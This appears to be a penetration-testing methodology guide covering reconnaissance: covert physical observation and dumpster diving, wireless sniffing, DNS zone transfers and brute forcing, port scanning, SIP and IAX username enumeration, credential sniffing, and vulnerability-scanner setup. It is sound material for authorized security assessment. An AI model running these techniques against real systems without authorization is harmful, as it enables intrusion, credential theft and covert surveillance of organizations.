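# Hypothetical example: harvest metadata from public documents
# -d  target domain              -t  file types to search for
# -l  limit of search results    -n  limit of files to download
# -o  working directory for downloads
# -f  HTML report file
metagoofil -d example.com -t pdf,doc,xls,ppt -l 100 -n 25 \
    -o ./files -f results.html
```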

Exif Reader (Windows)

Exif Reader is image file analysis software for Windows. It analyzes and displays the shutter speed, flash condition, focal length, and other image information included in the Exif image format which is supported by almost all the latest digital cameras. Exif image files with an extension of JPG can be treated in the same manner as conventional JPEG files. This software analyzes JPEG files created by digital cameras and can be downloaded from http://www.takenet.or.jp/~ryuuji/minisoft/exifread/english.

ExifTool (Windows/OS X)

ExifTool is a Windows and OS X tool for reading metadata. ExifTool supports a wide range of file formats. ExifTool can be downloaded from http://www.sno.phy.queensu.ca/~phil/exiftool.

Image Search

While not directly related to metadata, TinEye is also useful: http://www.tineye.com/. If a profile is found that includes a picture but not a real name, TinEye can sometimes be used to find other profiles on the Internet that may have more information about a person (including personals sites).

Covert gathering

On-location gathering

On-Site visits also allow assessment personnel to observe and gather information about the physical, environmental, and operational security of the target.

Adjacent Facilities

Once the physical locations have been identified, it is useful to identify the adjacent facilities. Adjacent facilities should be documented and if possible, include any observed shared facilities or services.

Physical security inspections

Covert physical security inspections are used to ascertain the security posture of the target. They are conducted covertly, without any party knowing they are being inspected. Observation is the key component of this activity. Physical security measures that should be observed include the equipment, procedures, and devices used to protect against possible threats. A physical security inspection should include, but is not limited to, the following:

Security guards

Observing security guards (or security officers) is often the first step in assessing the most visible deterrent. Security guards are uniformed and act to protect property by maintaining a high-visibility presence to deter illegal and inappropriate actions. By observing security guard movements directly, it is possible to determine procedures in use or establish movement patterns. You will need to observe what the security guards are protecting. It is possible to utilize binoculars to observe any movement from a safe distance.

Badge Usage

Badge usage refers to a physical security method that involves the use of identification badges as a form of access control. Badging systems may be tied to a physical access control system or simply used as a visual validation mechanism. Individual badge usage is important to document. By observing badge usage, it may be possible to actually duplicate the specific badge being utilized. The specific items that should be noted are whether the badge is required to be visible or shown to gain physical access to the property or facility. Badge usage should be documented and, if possible, include observed validation procedures.

Locking devices

A locking device is a mechanical or electronic mechanism often implemented to prevent unauthorized ingress or egress. These can be as simple as a door lock or dead-bolt, or as complex as a cipher lock. By observing the type and placement of the locking devices on doors, it is possible to determine whether the door is primarily used for ingress or egress. You will need to observe what the locking devices are protecting. All observations should be documented and, if possible, photographs taken.

Intrusion detection systems (IDS)/Alarms

Intrusion detection systems (IDS) and alarms are used to detect and announce unauthorized entry. Observing the type and placement of visible sensors (for example, door and window contacts, motion detectors, and glass-break sensors), as well as any alarm panels, keypads, or monitoring signage, makes it possible to determine the areas being monitored and potential gaps in coverage. All observations should be documented and, if possible, photographs taken.

Security lighting

Security lighting is often used as a preventative and corrective measure on a physical piece of property. Security lighting may aid in the detection of intruders, act as deterrence to intruders, or in some cases simply to increase the feeling of safety. Security lighting is often an integral component to the environmental design of a facility. Security lighting includes floodlights and low pressure sodium vapor lights. Most Security lighting that is intended to be left on all night is of the high-intensity discharge lamp variety. Other lights may be activated by sensors such as passive infrared sensors (PIRs), turning on only when a person (or other mammal) approaches. PIR activated lamps will usually be incandescent bulbs so that they can activate instantly; energy saving is less important since they will not be on all the time. PIR sensor activation can increase both the deterrent effect (since the intruder knows that he has been detected) and the detection effect (since a person will be attracted to the sudden increase in light). Some PIR units can be set up to sound a chime as well as turn on the light. Most modern units have a photocell so that they only turn on when it is dark.

Security lighting may be subject to vandalism, possibly to reduce its effectiveness for a subsequent intrusion attempt. Thus security lights should either be mounted very high, or else protected by wire mesh or tough polycarbonate shields. Other lamps may be completely recessed from view and access, with the light directed out through a light pipe, or reflected from a polished aluminum or stainless steel mirror. For similar reasons high security installations may provide a stand-by power supply for their security lighting. Observe and document the type, number, and locations of security lighting in use.

Surveillance /CCTV systems

Surveillance/CCTV systems may be used to observe activities in and around a facility from a centralized area. Surveillance/CCTV systems may operate continuously or only when activated as required to monitor a particular event. More advanced Surveillance/CCTV systems utilize motion-detection devices to activate the system. IP-based Surveillance/CCTV cameras may be implemented for a more decentralized operation.

Access control devices

Access control devices enable access control to areas and/or resources in a given facility. Access control refers to the practice of restricting entrance to a property, a building, or a room to authorized persons. Access control can be achieved by a human (a security guard, or receptionist), through mechanical means such as locks and keys, or through technological means such as access control systems like the Access control vestibule.

Some readers may have additional features such as an LCD and function buttons for data collection purposes (i.e. clock-in/clock-out events for attendance reports), camera/speaker/microphone for intercom, and smart card read/write support. Observe and document the type, number, and locations of access control devices in use.

Environmental Design

Environmental design involves the surrounding environment of a building or facility. In the scope of physical security, environmental design includes the facility's geography, landscape, architecture, and exterior design.

Employee Behavior

Observing employees is often one of the easier steps to perform. Employee actions generally provide insight into corporate behaviors and acceptable norms. By observing employees, it is possible to determine procedures in use or establish ingress and egress traffic patterns. It is possible to utilize binoculars to observe any movement from a safe distance.

Dumpster diving

Traditionally, most targets dispose of their trash in either garbage cans or dumpsters. These may or may not be separated based upon the recyclability of the material. Dumpster diving is the practice of sifting through commercial or residential trash to find items that have been discarded by their owners, but which may be useful. This is oftentimes an extremely dirty process that can yield significant results. Dumpsters are usually located on private premises, and diving in them may therefore subject the assessment team to trespassing on property not owned by the target. Though the law is enforced with varying degrees of rigor, ensure that this is authorized as part of the engagement. Dumpster diving per se is often legal when not specifically prohibited by law. Rather than take the refuse from the area, it is commonly accepted to simply photograph the obtained material and then return it to the original dumpster.

RF / Wireless Frequency scanning

A band is a section of the spectrum of radio communication frequencies, in which channels are usually used or set aside for the same purpose. To prevent interference and allow for efficient use of the radio spectrum, similar services are allocated in bands of non-overlapping ranges of frequencies.

Each of these bands has a basic band plan which dictates how it is to be used and shared, to avoid interference, and to set protocol for the compatibility of transmitters and receivers. Within the US, band plans are allocated and controlled by the Federal Communications Commission (FCC). The chart below illustrates the current band plans.

To avoid confusion, there are two bands on which we could focus our efforts. The band plans that would be of interest to an attacker are indicated in the following chart.

A Radio Frequency (RF) site survey, sometimes called a wireless site survey, is the process of determining the frequencies in use within a given environment. When conducting an RF site survey, it is very important to identify an effective range boundary, which involves determining the signal-to-noise ratio (SNR) at various points around a facility.

Useful search terms and sources for identifying the target's frequencies include:

“Target Company” scanner

“Target Company” frequency

“Target Company” guard frequency

“Target Company” MHz

Press releases from radio manufacturers and resellers regarding the target

Press releases from guard outsourcing companies talking about contracts with the target company

Frequency Usage

A frequency counter is an electronic instrument used to measure the number of oscillations or pulses per second in a repetitive electronic signal. Using a frequency counter or spectrum analyzer, it is possible to identify the transmitting frequencies in use around the target facility.

A spectrum analyzer can be used to visually illustrate the frequencies in use. These usually target specific ranges that are generally more focused than a frequency counter; for example, a sweep range of 2399-2485 MHz can clearly illustrate activity in the 2.4 GHz band.

All frequency ranges in use in and around the target should be documented.

Equipment Identification

As part of the on-site survey, all radios and antennas in use should be identified, including radio make and model as well as the length and type of antennas utilized. A few good resources are available to help you identify radio equipment.

Identifying 802.11 equipment is usually much easier to accomplish, if not visually, then via RF emissions. For visual identification, most vendor websites can be searched to identify the specific make and model of the equipment in use.

In a passive manner, it is possible to identify the manufacturer based upon data collected from RF emissions.

Airmon-ng

Airmon-ng is used to enable monitor mode on wireless interfaces. It may also be used to go back from monitor mode to managed mode. It is important to determine if our USB devices are properly detected. For this we can use lsusb, to list the currently detected USB devices.

In our example, the distribution has detected not only the Prolific PL2303 serial port, where we have our USB GPS connected, but also the Realtek RTL8187 wireless adapter. Now that we have determined that the distribution recognizes the installed devices, we need to determine if the wireless adapter is already in monitor mode by running airmon-ng without parameters.
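The checks described above might look like the following; interface names such as wlan0 will vary from system to system.

```shell
# List detected USB devices (the GPS and wireless adapter should appear)
lsusb

# Show wireless interface status; an interface such as "mon0" in the
# output indicates a monitor-mode interface already exists
airmon-ng

# If not, enable monitor mode on the wireless interface (wlan0 here)
airmon-ng start wlan0
```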


Once again, entering the airmon-ng command without parameters will show the interfaces status.

Airodump-ng

Airodump-ng is part of the Aircrack-ng network software suite. Specifically, Airodump-ng is a packet sniffer that places air traffic into packet capture (PCAP) files or initialization vector (IVS) files and shows information about wireless networks.

Usage:
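A typical invocation, assuming the monitor-mode interface created earlier is named mon0 (an illustrative name):

```shell
# Capture on the monitor interface and write results to capture-01.cap
airodump-ng --write capture mon0

# Optionally lock onto a single channel and access point (BSSID shown
# here is a placeholder)
airodump-ng --channel 6 --bssid 00:11:22:33:44:55 --write capture mon0
```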

Airodump-ng will display a list of detected APs and a list of connected clients (“stations”).


Kismet-Newcore

Kismet-newcore is a network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. Kismet will work with any wireless card which supports raw monitoring mode, and can sniff 802.11a, 802.11b, 802.11g, and 802.11n traffic.

Kismet is composed of 3 parts:

Drones: Capture the wireless traffic to report it to the server; they have to be started manually.

Server: Central place that connects to the drones and accepts client connections. It can also capture wireless traffic.

Client: The GUI part that will connect to the server.

Kismet has to be configured to work properly. First, we need to determine if our wireless adapter is already in monitor mode by running airmon-ng without parameters.


Kismet is able to use more than one interface, like Airodump-ng. To use that feature, /etc/kismet/kismet.conf has to be edited manually, as airmon-ng cannot configure more than one interface for Kismet. For each adapter, add a source line to kismet.conf.
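A sketch of what such source lines might look like; the exact syntax depends on the Kismet version in use (older releases use source=driver,interface,name, while newcore builds use ncsource=), and the driver types and interface names below are illustrative only.

```shell
# Older-style kismet.conf source lines, one per adapter
source=rtl8187,wlan0,adapter-one
source=rt73,wlan1,adapter-two

# Newcore-style equivalent
ncsource=wlan0
ncsource=wlan1
```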

Typing “kismet” in a console and hitting “Enter” will start up Kismet.

As described earlier, Kismet consists of three components, and the initial screen informs us that we need to either start the Kismet server or choose to use a server that has been started elsewhere. For our purposes, we will click “Yes” to start the Kismet server locally.

Kismet presents us with the options to choose as part of the server startup process.

Unless we configured a source in /etc/kismet/kismet.conf, we will need to specify a source from which we want to capture packets.

As referenced earlier, we created a monitor sub-interface from our wireless interface. For our purposes, we will enter “mon0”, though your interface may have a completely different name.

When the Kismet server and client are running properly, wireless networks should start to show up. We have highlighted a WEP enabled network. There are numerous sorting options that you can choose from. We will not cover all the functionality of Kismet at this point, but if you're not familiar with the interface you should play with it until you get comfortable.

inSSIDer

If you are used to using Netstumbler, you may be disappointed to hear that it doesn't function properly with Windows Vista and 7 (64-bit). That being said, all is not lost, as there is an alternative that is compatible with Windows XP, Vista and 7 (32 and 64-bit). It makes use of the native Wi-Fi API and is compatible with most GPS devices (NMEA v2.3 and higher). inSSIDer has some features that make it the tool of choice if you're using Windows. inSSIDer can track the strength of the received signal in dBm over time, filter access points, and also export Wi-Fi and GPS data to a KML file to view in Google Earth.

External Footprinting

The External Footprinting phase of Intelligence Gathering involves collecting response results from a target based upon direct interaction from an external perspective. The goal is to gather as much information about the target as possible.

Identifying IP Ranges

For external footprinting, we first need to determine which one of the WHOIS servers contains the information we’re after. Given that we should know the TLD for the target domain, we simply have to locate the Registrar that the target domain is registered with.

WHOIS lookup

ICANN – http://www.icann.org

IANA – http://www.iana.org

NRO – http://www.nro.net

AFRINIC – http://www.afrinic.net

APNIC – http://www.apnic.net

ARIN – http://ws.arin.net

LACNIC – http://www.lacnic.net

RIPE – http://www.ripe.net

Once the appropriate Registrar has been queried, we can obtain the Registrant information. There are numerous sites that offer WHOIS information; however, for accuracy in documentation, you need to use only the appropriate Registrar.

InterNIC – http://www.internic.net
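From the command line, the same lookups can be sketched with the standard whois client; the domain and IP address below are illustrative placeholders.

```shell
# Query the registrant information for a domain; the output identifies
# the Registrar, which can then be queried directly for accuracy
whois example.com

# Query a specific RIR (ARIN in this illustration) for an IP address
whois -h whois.arin.net 192.0.2.1
```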

BGP looking glasses

It is possible to identify the Autonomous System Number (ASN) for networks that participate in Border Gateway Protocol (BGP). Since BGP route paths are advertised throughout the world, we can find these by using BGP4 and BGP6 looking glasses.

BGP4 – http://www.bgp4.as/looking-glasses

BGP6 – http://lg.he.net/

Active Reconnaissance

Manual browsing

Google Hacking – http://www.exploit-db.com/google-dorks

Passive Reconnaissance

Google Hacking – http://www.exploit-db.com/google-dorks

Active Footprinting

The active footprinting phase of Intelligence Gathering involves gathering response results from a target based upon direct interaction.

Zone Transfers

DNS zone transfer, also known as AXFR, is a type of DNS transaction. It is a mechanism designed to replicate the databases containing the DNS data across a set of DNS servers. Zone transfer comes in two flavors, full (AXFR) and incremental (IXFR). There are numerous tools available to test the ability to perform a DNS zone transfer. Tools commonly used to perform zone transfers are host, dig, and nmap.

Host
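A zone transfer attempt with host might look like the following, assuming a target domain of example.com served by ns1.example.com (both illustrative names):

```shell
# -t axfr requests a full zone transfer from the named server
host -t axfr example.com ns1.example.com
```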

Dig
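The equivalent request with dig, using the same illustrative names; nmap's dns-zone-transfer NSE script performs the same test:

```shell
# Request a full zone transfer (AXFR) with dig
dig axfr example.com @ns1.example.com

# nmap's NSE script against the name server on port 53
nmap -p 53 --script dns-zone-transfer \
    --script-args dns-zone-transfer.domain=example.com ns1.example.com
```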

Reverse DNS

Reverse DNS can be used to obtain valid server names in use within an organization. There is a caveat: the address must have a PTR (reverse) DNS record for a name to resolve from a provided IP address. If it does resolve, the results are returned. This is usually performed by testing the server with various IP addresses to see if it returns any results.
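A minimal sketch of such testing, using placeholder addresses from the documentation range:

```shell
# Resolve the PTR record for a single address
dig -x 192.0.2.10 +short

# host performs the same lookup
host 192.0.2.10

# Sweep a whole range with nmap's list scan, which performs
# reverse lookups without sending probes to the targets
nmap -sL 192.0.2.0/24
```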

DNS Bruting

After identifying all the information that is associated with the client domain(s), it is now time to begin to query DNS. Since DNS is used to map IP addresses to hostnames, and vice versa, we will want to see if it is insecurely configured. We will seek to use DNS to reveal additional information about the client. One of the most serious misconfigurations involving DNS is allowing Internet users to perform a DNS zone transfer. There are several tools that we can use to enumerate DNS to not only check for the ability to perform zone transfers, but to potentially discover additional host names that are not commonly known.

Fierce2 (Linux)

For DNS enumeration, there are two tools that are utilized to provide the desired results. The first that we will focus on is named Fierce2. As you can probably guess, this is a modification on Fierce. Fierce2 has lots of options, but the one that we want to focus on attempts to perform a zone transfer. If that is not possible, then it performs DNS queries using various server names in an effort to enumerate the host names that have been registered.


DNSEnum (Linux)

An alternative to Fierce2 for DNS enumeration is DNSEnum. As you can probably guess, this is very similar to Fierce2. DNSEnum offers the ability to enumerate DNS through brute forcing subdomains, performing reverse lookups, listing domain network ranges, and performing whois queries. It also performs Google scraping for additional names to query.

The command to run dnsenum is as follows:
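An illustrative invocation follows; the domain and wordlist name are placeholders, and option names should be verified against the installed version's help output.

```shell
# --enum combines common options (whois, reverse lookups, scraping);
# -f supplies a wordlist for subdomain brute forcing
dnsenum --enum -f dns.txt example.com
```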


Dnsdict6 (Linux)

Dnsdict6, which is part of the THC IPv6 Attack Toolkit, is an IPv6 DNS dictionary brute forcer. The options are relatively simple: specify the domain and a dictionary file.
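For example (domain and wordlist are illustrative):

```shell
# Brute force AAAA records for the domain using entries from the wordlist
dnsdict6 example.com wordlist.txt
```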

Port Scanning

Nmap (Windows/Linux)

Nmap (“Network Mapper”) is the de facto standard for network auditing/scanning. Nmap runs on both Linux and Windows and is available in both command line and GUI versions. For the sake of this document, we will only cover the command line version.

Nmap has dozens of options available. Since this section is dealing with port scanning, we will focus on the commands required to perform this task. It is important to note that the commands utilized depend mainly on the time available and the number of hosts being scanned. The more hosts, or the less time, that you have to perform this task, the less we will interrogate each host. This will become evident as we continue to discuss the options.

On large IP sets, those greater than 100 IP addresses, do not specify a port range. The command that will be utilized is as follows:
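One plausible form of such a scan, sketched with placeholder file names; leaving the port specification off causes Nmap to scan its default port set.

```shell
# SYN scan of the default ports, skipping host discovery (-Pn),
# reading targets from a file and saving all output formats (-oA)
nmap -sS -Pn -iL targets.txt -oA external_scan
```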

It should be noted that Nmap has limited options for IPv6. These include TCP connect (-sT), Ping scan (-sn), List scan (-sL) and version detection.

SNMP Sweeps

SNMP sweeps are often performed as well, as they offer a wealth of information about a specific system. The SNMP protocol is a stateless, datagram-oriented protocol. Unfortunately, SNMP servers do not respond to requests with invalid community strings, and the underlying UDP protocol does not reliably report closed UDP ports. This means that “no response” from a probed IP address can mean any of the following:

The machine is unreachable

The SNMP server is not running

An invalid community string was used

The response datagram has not yet arrived

SNMPEnum (Linux)

SNMPEnum is a Perl script that sends SNMP requests to a single host, then waits for the responses to come back and logs them.
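A representative invocation, with a placeholder target: the script takes the host, a community string, and a configuration file describing which OIDs to request (per-platform config files ship with the tool).

```shell
# Enumerate a host using the "public" community string and the
# Linux OID configuration bundled with snmpenum
perl snmpenum.pl 192.0.2.5 public linux.txt
```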

SMTP Bounce Back

SMTP bounce back, also called a Non-Delivery Report/Receipt (NDR), a (failed) Delivery Status Notification (DSN) message, a Non-Delivery Notification (NDN), or simply a bounce, is an automated electronic mail message from a mail system informing the sender of another message about a delivery problem. This can be used to assist an attacker in fingerprinting the SMTP server, as SMTP server information, including software and versions, may be included in a bounce message.

Banner Grabbing

Banner grabbing is an enumeration technique used to glean information about computer systems on a network and the services running on their open ports. Banner grabbing is used to identify the versions of applications and the operating system that the target host is running.

HTTP
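A simple HTTP banner grab can be sketched with netcat or nmap; the host name below is a placeholder.

```shell
# Manual banner grab: the Server response header usually reveals
# the web server software and version
printf 'HEAD / HTTP/1.0\r\n\r\n' | nc www.example.com 80

# The same information via nmap service/version detection
nmap -sV -p 80 www.example.com
```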

Internal Footprinting

The Internal Footprinting phase of Intelligence Gathering involves gathering response results from a target based upon direct interaction from an internal perspective. The goal is to gather as much information about the target as possible.

Active Footprinting

The active footprinting phase of Intelligence Gathering involves gathering response results from a target based upon direct interaction.

Ping Sweeps

Active footprinting begins with the identification of live systems. This is usually performed by conducting a Ping sweep to determine which hosts respond.

Nmap (Windows/Linux)

Nmap (“Network Mapper”) is the de facto standard for network auditing/scanning. Nmap runs on both Linux and Windows and is available in both command line and GUI versions. For the sake of this document, we will only cover the command line version.

Nmap has dozens of options available. Since this section is dealing with ping sweeps, we will focus on the commands required to perform this task. It is important to note that the commands utilized depend mainly on the time available and the number of hosts being scanned. The more hosts, or the less time, that you have to perform this task, the less we will interrogate each host. This will become evident as we continue to discuss the options.
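A minimal ping sweep might look like the following, with a placeholder internal range:

```shell
# -sn disables port scanning (host discovery only); -oG saves
# greppable output for later processing
nmap -sn -oG ping_sweep.txt 192.168.1.0/24
```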

Alive6 (Linux)

Alive6, which is part of the THC IPv6 Attack Toolkit, offers the most effective mechanism for detecting all IPv6 systems.

Alive6 offers numerous options, but can be simply run by just specifying the interface. This returns all the IPv6 systems that are live on the local-link.
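For example, with an illustrative interface name:

```shell
# Detect live IPv6 systems on the local link via eth0
alive6 eth0
```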

Port Scanning

Nmap (Windows/Linux)

Nmap (“Network Mapper”) is the de facto standard for network auditing/scanning. Nmap runs on both Linux and Windows and is available in both command line and GUI versions. For the sake of this document, we will only cover the command line version.

Nmap has dozens of options available. Since this section is dealing with port scanning, we will focus on the commands required to perform this task. It is important to note that the commands utilized depend mainly on the time available and the number of hosts being scanned. The more hosts, or the less time, that you have to perform this task, the less we will interrogate each host. This will become evident as we continue to discuss the options.

On large IP sets, those greater than 100 IP addresses, do not specify a port range. The command that will be utilized is as follows:

It should be noted that Nmap has limited options for IPv6. These include TCP connect (-sT), Ping scan (-sn), List scan (-sL) and version detection.

SNMP Sweeps

SNMP sweeps are often performed as well, as they offer a wealth of information about a specific system. The SNMP protocol is a stateless, datagram-oriented protocol. Unfortunately, SNMP servers do not respond to requests with invalid community strings, and the underlying UDP protocol does not reliably report closed UDP ports. This means that “no response” from a probed IP address can mean any of the following:

The machine is unreachable

The SNMP server is not running

An invalid community string was used

The response datagram has not yet arrived

SNMPEnum (Linux)

SNMPEnum is a Perl script that sends SNMP requests to a single host, then waits for the responses to come back and logs them.

Metasploit

Active footprinting can also be performed to a certain extent through Metasploit. Please refer to the Metasploit Unleashed course for more information on this subject.

Zone Transfers

DNS zone transfer, also known as AXFR, is a type of DNS transaction. It is a mechanism designed to replicate the databases containing the DNS data across a set of DNS servers. Zone transfer comes in two flavors, full (AXFR) and incremental (IXFR). There are numerous tools available to test the ability to perform a DNS zone transfer. Tools commonly used to perform zone transfers are host, dig and nmap.

Host

Dig

SMTP Bounce Back

SMTP bounce back, also called a Non-Delivery Report/Receipt (NDR), a (failed) Delivery Status Notification (DSN) message, a Non-Delivery Notification (NDN), or simply a bounce, is an automated electronic mail message from a mail system informing the sender of another message about a delivery problem. This can be used to assist an attacker in fingerprinting the SMTP server, as SMTP server information, including software and versions, may be included in a bounce message.

Reverse DNS

Reverse DNS can be used to obtain valid server names in use within an organization. There is a caveat: the address must have a PTR (reverse) DNS record for a name to resolve from a provided IP address. If it does resolve, the results are returned. This is usually performed by testing the server with various IP addresses to see if it returns any results.

Banner Grabbing

Banner grabbing is an enumeration technique used to glean information about computer systems on a network and the services running on their open ports. Banner grabbing is used to identify the versions of applications and the operating system that the target host is running.

HTTP

httprint

httprint is a web server fingerprinting tool. It relies on web server characteristics to accurately identify web servers, despite the fact that they may have been obfuscated by changing the server banner strings or by plug-ins such as mod_security or ServerMask. httprint can also be used to detect web-enabled devices that do not have a server banner string, such as wireless access points, routers, switches, and cable modems. httprint uses text signature strings, and it is very easy to add signatures to the signature database.
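A representative invocation, with a placeholder host; the signatures file referenced is the one distributed with the tool.

```shell
# -h target host   -s signature database   -P0 skip the ICMP ping
httprint -h www.example.com -s signatures.txt -P0
```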

VoIP mapping

VoIP mapping is where we gather information about the topology, servers, and clients. The main goals are to find live hosts, the PBX type and version, VoIP servers/gateways, and client (hardware and software) types and versions. The majority of techniques covered here assume a basic understanding of the Session Initiation Protocol (SIP). There are several tools available to help us identify and enumerate VoIP enabled devices. SMAP is a tool specifically designed to scan for SIP enabled devices by generating SIP requests and awaiting responses. SMAP usage is as follows:
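For example, with placeholder addresses:

```shell
# Scan a single host for SIP support
smap 192.0.2.20

# Scan an entire subnet for SIP enabled devices
smap 192.0.2.0/24
```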

SIPScan is another scanner for SIP enabled devices that can scan a single host or an entire subnet.

Extensions

Extensions are any client application or device that initiates a SIP connection, such as an IP phone, PC softphone, PC instant messaging client, or mobile device. The goal is to identify valid usernames or extensions of SIP devices. Enumerating extensions is usually a product of the error messages returned using the SIP method: REGISTER, OPTIONS, or INVITE. There are many tools that can be utilized to enumerate SIP devices. A tool that can be used to enumerate extensions is Svwar from the SIPVicious suite.

Svwar

Svwar, also a tool from the SIPVicious suite, allows you to enumerate extensions using either a range of extensions or a dictionary file. Svwar supports all three of the extension enumeration methods mentioned above; the default method for enumeration is REGISTER. Svwar usage is as follows:
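For example (the target address is a placeholder), svwar can walk a numeric extension range or take a dictionary file, and the SIP method can be switched with -m:

```shell
# Guess extensions 100-999 using the default REGISTER method.
svwar.py -e100-999 192.0.2.20

# Use a dictionary of candidate extensions and the INVITE method instead.
svwar.py -d dictionary.txt -m INVITE 192.0.2.20
```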

enumIAX

If you’ve identified that an Asterisk server is in use, you can utilize a username guessing tool such as enumIAX to enumerate Asterisk Exchange protocol usernames. enumIAX is an Inter Asterisk Exchange version 2 (IAX2) protocol username brute-force enumerator. enumIAX may operate in two distinct modes: Sequential Username Guessing or Dictionary Attack. enumIAX usage is as follows:
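A sketch of both modes against a hypothetical Asterisk server (address and wordlist name are placeholders):

```shell
# Sequential username guessing (the default mode), with verbose output.
enumiax -v 192.0.2.30

# Dictionary attack using a supplied wordlist.
enumiax -d dict.txt 192.0.2.30
```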

Passive Reconnaissance

Packet Sniffing

Performing packet sniffing allows for the collection of IP addresses and MAC addresses from systems that have packet traffic in the stream being analyzed. For the most part, packet sniffing is difficult to detect, so this form of recon is essentially passive and quite stealthy. By collecting and analyzing a large number of packets it becomes possible to fingerprint the operating system and the services that are running on a given device. It may also be possible to grab login information, password hashes, and other credentials from the packet stream. Telnet and older versions of SNMP pass credentials in plain text and are easily compromised with sniffing. Packet sniffing can also be useful in determining which servers act as critical infrastructure and are therefore of interest to an attacker.
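As one common approach, tcpdump can capture the stream to a pcap file for offline analysis; the interface name and subnet below are placeholders for your environment:

```shell
# Capture traffic on eth0 without name resolution and save it for analysis.
tcpdump -i eth0 -n -w capture.pcap net 192.0.2.0/24

# Later, review cleartext telnet traffic from the capture in ASCII.
tcpdump -nn -A -r capture.pcap port 23
```

Writing to a pcap rather than the terminal keeps the raw packets available for later fingerprinting and credential review in a tool such as Wireshark.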

Vulnerability Analysis

Vulnerability Analysis is used to identify and evaluate the security risks posed by identified vulnerabilities. Vulnerability analysis work is divided into two areas: identification and validation. The vulnerability discovery effort is the key component of the identification phase; validation reduces the number of identified vulnerabilities to only those that are actually valid.

Vulnerability Testing

Vulnerability Testing is divided into active and passive methods.

Active

Automated Tools

An automated scanner is designed to assess networks, hosts, and associated applications. There are a number of automated scanners available today; some focus on particular targets or types of targets. The core purpose of an automated scanner is the enumeration of vulnerabilities present on networks, hosts, and associated applications.

Network/General Vulnerability Scanners

Open Vulnerability Assessment System (OpenVAS) (Linux)

The Open Vulnerability Assessment System (OpenVAS) is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution. OpenVAS is a fork of Nessus that allows free development of a non-proprietary tool.

Screenshot Here

Once you accept the certificate, OpenVAS will initialize and indicate the number of Found and Enabled plugins. This could take a while depending upon the number of plugins that need to be downloaded. Also, you need to ensure that you’ve added the appropriate /etc/hosts entries for both the IPv4 and IPv6 addresses. For example:
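A minimal sketch of such entries, with a placeholder address pair and hostname:

```
192.0.2.5      openvas-server
2001:db8::5    openvas-server
```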

Screenshot Here

Nessus (Windows/Linux)

Nessus is a commercial automated scanning program. It is designed to detect potential vulnerabilities on the networks, hosts, and associated application being assessed. Nessus allows for custom policies to be utilized for specific evaluations. For non-Web applications, the policy that should be utilized is the “Only Safe Checks” policy (See Appendix A). For Web applications, the policy that should be utilized is the “Only Safe Checks (Web)” policy (See Appendix B).

Screenshot Here

Within Nessus, there are four main tabs available: Reports, Scans, Policies, and Users. Screenshot Here

You will create a new scan by clicking on the “Scans” option on the menu bar at the top and then click on the “+ Add” button on the right. The “Add Scan” screen will be displayed as follows: Screenshot Here

Once all these fields have been properly populated click “Launch Scan” to initiate the scan process.

A validation scan should be conducted weekly against <IP ADDRESS> using the “Validation Scan” policy (See Appendix C) to ensure that Nessus is performing scans properly.

Once the scan has completed running, it will be visible in the Reports tab. To open the scan reports simply double-click on the appropriate completed scan file. This will provide us with some information about the scan as well as the results. Screenshot Here

NeXpose

NeXpose is a commercial automated scanning product that provides vulnerability management, policy compliance and remediation management. It is designed to detect vulnerabilities as well as policy compliance issues on the networks, hosts, and associated web applications being assessed.

Screenshot Here

Prior to running any NeXpose scan, the product should be validated to ensure that it has been properly updated with the latest signatures. This process is normally run as part of a scheduled task, but you can quickly validate that the scanner is up to date by simply viewing the ‘News’ page, which will give you a log of all the updates to the scan engine as well as any updated checks.

Within NeXpose, there are six main tabs available: Home, Assets, Tickets, Reports, Vulnerabilities, and Administration. Screenshot Here

Screenshot Here

Type a name for the target site. Then add a brief description for the site, and select a level of importance from the dropdown list. The importance level corresponds to a risk factor that NeXpose uses to calculate a risk index for each site. The ‘Very Low’ setting reduces a risk index to 1/3 of its initial value. The ‘Low’ setting reduces the risk index to 2/3 of its initial value. ‘High’ and ‘Very High’ settings increase the risk index to 2x and 3x its initial value, respectively. A ‘Normal’ setting does not change the risk index.

Go to the Devices page to list assets for your new site. IP addresses and/or host names can be manually entered in the text box labeled ‘Devices to scan’. It is also possible to import a comma-separated file that lists the IP addresses and/or host names of targets you want to scan. You do have to ensure that each address/hostname in the file appears on its own line.

If you need to exclude targets from a scan, the process is the same; however, it is performed under the area labeled ‘Devices to Exclude’.

Screenshot Here There are many templates available; however, be aware that if you modify a template, all sites that use that scan template will use the modified settings. So modify an existing template with caution.

Finally, if you wish to schedule a scan to run automatically, click the check box labeled ‘Enable schedule’. The console displays options for a start date and time, maximum scan duration in minutes, and frequency of repetition. If the scheduled scan runs and exceeds the maximum specified duration, it will pause for an interval that you specify in the option labeled ‘Repeat every’. Select an option for what you want the scan to do after the pause interval.

You can set up alerts to inform you when a scan starts, stops, fails, or matches a specific criterion.

Screenshot Here

Once the scan has completed, you can view the results in several ways. It is possible to view assets by sites, by groups, by operating systems, by services, by software, or to view all assets.

By selecting the appropriate assets view you can select the results that you wish to view.

To create a report, click on the ‘Create Site Report’ button. This will take you to the ‘New Report’ ‘Configuration’ page.

Report configuration entails selecting a report template, assets to report on, and distribution options. You may schedule automatic reports for generation and distribution after scans or on a fixed calendar timetable; or you may run reports manually. After you go through all the following configuration steps and click ‘Save’, NeXpose will immediately start generating a report.

eEYE Retina

eEye Retina Vulnerability Assessment Scanner is a vulnerability scanner created by eEye Digital Security that is used to correlate and validate findings from Nmap and Nessus.

Screenshot Here

Clicking on the Options Actions section presents us with additional options related to the Discovery scan. These options include ICMP Discovery, TCP Discovery on Ports (enter a comma-separated list of port numbers), UDP Discovery, Perform OS Detection, Get Reverse DNS, Get NetBIOS Name, and Get MAC Address. Select the appropriate options for the scan desired.

To run the Discovery scan immediately click “Discover.” To run the Discovery scan at a later point in time or on a regular schedule, click “Schedule.” Retina displays your results in the Results table as it scans the selected IP(s). In order to get the results in a format that we can use, we need to select the scan results and click “Generate” to export the results in XML format.

While Discovery Scans may be useful, the majority of our tasks will take place in the Audit Interface. This is very similar to the Discovery Scan interface; however it does have a few more options.

The Targets section is similar though there is an additional section that allows us to specify the Output Type, Name, and Job Name.

This section is important to complete, as this is how the scan results will be saved. If you do not change this information then you could potentially overwrite someone else’s scan results. By default, these are saved to the following directory:

This is important to note, as you will need to copy these from this location to your working directory.

Screenshot Here

Perform OS Detection

Get Reverse DNS

Get NetBIOS Name

Get MAC Address

Perform Traceroute

Enable Connect Scan

Enable Force Scan

Randomize Target List

Enumerate Registry via NetBIOS

Enumerate Users via NetBIOS

Enumerate Shares via NetBIOS

